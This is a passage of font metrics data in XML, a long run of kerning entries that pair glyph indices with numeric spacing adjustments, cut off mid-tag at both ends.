kpx2="174"/></kerning><kerning kpx1="112"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="123"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="251"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="213"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="208"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="187"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="113"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="144"><pair kern="-40" kpx2="180"/><pair kern="-54" kpx2="197"/><pair kern="-44" kpx2="181"/></kerning><kerning kpx1="59"><pair kern="-72" kpx2="100"/><pair kern="-63" kpx2="210"/><pair kern="-17" kpx2="55"/><pair kern="-44" kpx2="114"/><pair kern="-44" kpx2="72"/><pair kern="-63" kpx2="175"/><pair kern="-49" kpx2="16"/><pair kern="-63" kpx2="50"/><pair kern="-63" kpx2="209"/><pair kern="-44" kpx2="112"/><pair kern="-72" kpx2="251"/><pair kern="-63" kpx2="103"/><pair kern="-63" kpx2="208"/><pair kern="-44" kpx2="113"/><pair kern="-40" kpx2="181"/><pair kern="-77" kpx2="180"/><pair kern="-54" kpx2="169"/><pair kern="-21" kpx2="197"/><pair kern="-72" kpx2="38"/><pair kern="-72" kpx2="253"/><pair kern="-44" kpx2="115"/></kerning><kerning kpx1="73"><pair kern="31" kpx2="180"/><pair kern="-17" kpx2="90"/><pair kern="-72" kpx2="17"/><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="169"/><pair kern="-114" kpx2="197"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="87"/><pair kern="-54" kpx2="16"/><pair kern="-35" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="41"><pair kern="-17" kpx2="227"/><pair kern="-54" kpx2="126"/><pair kern="-91" kpx2="107"/><pair kern="-91" kpx2="235"/><pair kern="-54" kpx2="72"/><pair kern="-91" kpx2="199"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="112"/><pair kern="-54" kpx2="113"/><pair kern="-17" kpx2="54"/><pair kern="-21" kpx2="180"/><pair kern="-91" kpx2="105"/><pair kern="-54" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-91" kpx2="201"/><pair kern="-72" kpx2="85"/><pair kern="-91" kpx2="106"/><pair kern="-77" kpx2="29"/><pair kern="-35" kpx2="125"/><pair kern="-54" kpx2="115"/><pair kern="-54" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-91" kpx2="68"/><pair kern="-91" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-91" kpx2="186"/><pair kern="-17" kpx2="55"/><pair kern="-54" kpx2="114"/><pair kern="-54" kpx2="127"/><pair kern="-91" kpx2="108"/><pair kern="-91" kpx2="98"/><pair kern="-72" kpx2="76"/><pair kern="-160" kpx2="17"/><pair kern="-54" kpx2="128"/><pair kern="-91" kpx2="173"/><pair kern="-91" kpx2="109"/><pair kern="-183" kpx2="197"/><pair kern="-91" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-91" kpx2="110"/><pair kern="-91" kpx2="174"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="124"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="169"><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="235"/><pair kern="-17" kpx2="58"/><pair kern="-17" kpx2="186"/><pair kern="-54" kpx2="55"/><pair kern="-17" kpx2="251"/><pair kern="-72" kpx2="187"/><pair kern="-17" kpx2="39"/><pair kern="73" kpx2="144"/><pair kern="-17" kpx2="45"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-72" kpx2="60"/><pair kern="-17" kpx2="89"/><pair kern="-17" kpx2="253"/><pair kern="-54" kpx2="57"/><pair kern="-17" kpx2="37"/><pair kern="-17" kpx2="42"/><pair kern="-72" kpx2="234"/></kerning><kerning kpx1="201"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="60"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="85"><pair kern="-21" kpx2="254"/><pair kern="-21" kpx2="72"/><pair kern="-63" kpx2="16"/><pair kern="-21" kpx2="112"/><pair kern="-21" kpx2="123"/><pair kern="-17" kpx2="80"/><pair kern="-21" kpx2="113"/><pair kern="-17" kpx2="71"/><pair kern="-21" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-21" kpx2="252"/><pair kern="-21" kpx2="70"/><pair kern="-17" kpx2="85"/><pair kern="-17" kpx2="29"/><pair kern="-21" kpx2="125"/><pair kern="-21" kpx2="115"/><pair kern="-21" kpx2="111"/><pair kern="-21" kpx2="122"/><pair kern="-21" kpx2="82"/><pair kern="-17" kpx2="75"/><pair kern="-21" kpx2="114"/><pair kern="-26" kpx2="91"/><pair kern="-17" kpx2="81"/><pair kern="41" kpx2="181"/><pair kern="-91" kpx2="17"/><pair kern="-151" kpx2="197"/><pair kern="-17" kpx2="74"/><pair kern="-17" kpx2="84"/><pair kern="-21" kpx2="121"/><pair kern="-17" kpx2="247"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="61"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="234"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="100"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="122"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="47"><pair kern="-17" kpx2="126"/><pair kern="-91" kpx2="235"/><pair kern="-49" kpx2="104"/><pair kern="-17" kpx2="72"/><pair kern="22" kpx2="199"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-49" kpx2="213"/><pair kern="-35" kpx2="208"/><pair kern="-132" kpx2="187"/><pair kern="-17" kpx2="113"/><pair kern="-202" kpx2="180"/><pair kern="-17" kpx2="129"/><pair kern="-17" kpx2="124"/><pair kern="22" kpx2="201"/><pair kern="-132" kpx2="60"/><pair kern="-49" kpx2="211"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="115"/><pair kern="-132" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-17" kpx2="122"/><pair kern="-35" kpx2="210"/><pair kern="22" kpx2="36"/><pair kern="-17" kpx2="82"/><pair kern="-91" kpx2="58"/><pair kern="-91" kpx2="186"/><pair kern="-137" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-35" kpx2="175"/><pair kern="-17" kpx2="127"/><pair kern="-35" kpx2="50"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="22" kpx2="98"/><pair kern="-262" kpx2="181"/><pair kern="-17" kpx2="128"/><pair kern="22" kpx2="173"/><pair kern="-49" kpx2="212"/><pair kern="-91" kpx2="92"/><pair kern="-17" kpx2="121"/><pair kern="-109" kpx2="57"/><pair kern="22" kpx2="174"/><pair kern="-49" kpx2="56"/></kerning><kerning kpx1="210"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="58"><pair kern="-35" kpx2="126"/><pair kern="-63" kpx2="107"/><pair kern="-17" kpx2="235"/><pair kern="-58" kpx2="72"/><pair kern="-54" kpx2="199"/><pair kern="-40" kpx2="16"/><pair kern="-58" kpx2="112"/><pair kern="-58" kpx2="123"/><pair kern="-58" kpx2="113"/><pair kern="-17" kpx2="180"/><pair kern="-63" kpx2="105"/><pair kern="-35" kpx2="129"/><pair kern="-58" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-54" kpx2="201"/><pair kern="-44" kpx2="85"/><pair kern="-63" kpx2="106"/><pair kern="-58" kpx2="29"/><pair kern="-58" kpx2="125"/><pair kern="-17" kpx2="170"/><pair kern="-58" kpx2="115"/><pair kern="-35" kpx2="88"/><pair kern="-58" kpx2="122"/><pair kern="-63" kpx2="68"/><pair kern="-54" kpx2="36"/><pair kern="-58" kpx2="82"/><pair kern="-17" kpx2="186"/><pair kern="-58" kpx2="114"/><pair kern="-35" kpx2="127"/><pair kern="-63" kpx2="108"/><pair kern="-54" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-114" kpx2="17"/><pair kern="-35" kpx2="128"/><pair kern="-54" kpx2="173"/><pair kern="-63" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-17" kpx2="92"/><pair kern="-58" kpx2="121"/><pair kern="-63" kpx2="110"/><pair kern="-54" kpx2="174"/></kerning><kerning kpx1="82"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="186"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="175"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="209"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="103"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="81"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="98"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="212"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="229"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="38"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="121"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="57"><pair kern="-67" kpx2="126"/><pair kern="-77" kpx2="107"/><pair kern="-26" kpx2="235"/><pair kern="-77" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-58" kpx2="16"/><pair kern="-77" kpx2="123"/><pair kern="-77" kpx2="112"/><pair kern="-17" kpx2="208"/><pair kern="-77" kpx2="113"/><pair kern="-77" kpx2="105"/><pair kern="-67" kpx2="129"/><pair kern="-77" kpx2="124"/><pair kern="-86" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-77" kpx2="106"/><pair kern="-81" kpx2="29"/><pair kern="-77" kpx2="125"/><pair kern="-54" kpx2="170"/><pair kern="-77" kpx2="115"/><pair kern="-67" kpx2="88"/><pair kern="-77" kpx2="122"/><pair kern="-77" kpx2="68"/><pair kern="-17" kpx2="210"/><pair kern="-63" kpx2="36"/><pair kern="-77" kpx2="82"/><pair kern="-26" kpx2="186"/><pair kern="-77" kpx2="114"/><pair kern="-17" kpx2="175"/><pair kern="-67" kpx2="127"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-77" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-128" kpx2="17"/><pair kern="-67" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-77" kpx2="109"/><pair kern="-137" kpx2="197"/><pair kern="-26" kpx2="92"/><pair kern="-77" kpx2="121"/><pair kern="-77" kpx2="110"/><pair kern="-63" kpx2="174"/></kerning><kerning kpx1="37"><pair kern="-17" kpx2="227"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="251"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-17" kpx2="54"/><pair kern="-54" kpx2="180"/><pair kern="-30" kpx2="169"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-54" kpx2="181"/><pair kern="-40" kpx2="197"/><pair kern="-17" kpx2="38"/><pair kern="-30" kpx2="57"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="120"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="249"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="227"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="51"><pair kern="-17" kpx2="126"/><pair kern="-44" kpx2="107"/><pair kern="-35" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-21" kpx2="16"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="112"/><pair kern="-21" kpx2="187"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="86"/><pair kern="18" kpx2="180"/><pair kern="-44" kpx2="105"/><pair kern="-17" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-17" kpx2="85"/><pair kern="-21" kpx2="60"/><pair kern="-44" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-21" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-44" kpx2="68"/><pair kern="-63" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-17" kpx2="250"/><pair kern="-17" kpx2="127"/><pair kern="-44" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-17" kpx2="81"/><pair kern="-21" kpx2="76"/><pair kern="18" kpx2="181"/><pair kern="-155" kpx2="17"/><pair kern="-17" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-44" kpx2="109"/><pair kern="-160" kpx2="197"/><pair kern="-35" kpx2="121"/><pair kern="-17" kpx2="228"/><pair kern="-44" kpx2="110"/><pair kern="-63" kpx2="174"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="104"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="72"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="199"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="54"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="180"><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="246"/><pair kern="-30" kpx2="43"/><pair kern="-72" kpx2="123"/><pair kern="-35" kpx2="251"/><pair kern="-35" kpx2="208"/><pair kern="-188" kpx2="144"/><pair kern="-58" kpx2="59"/><pair kern="-35" kpx2="73"/><pair kern="-30" kpx2="41"/><pair kern="-72" kpx2="124"/><pair kern="-54" kpx2="85"/><pair kern="-128" kpx2="201"/><pair kern="-17" kpx2="61"/><pair kern="-35" kpx2="100"/><pair kern="-72" kpx2="122"/><pair kern="-30" kpx2="47"/><pair kern="-35" 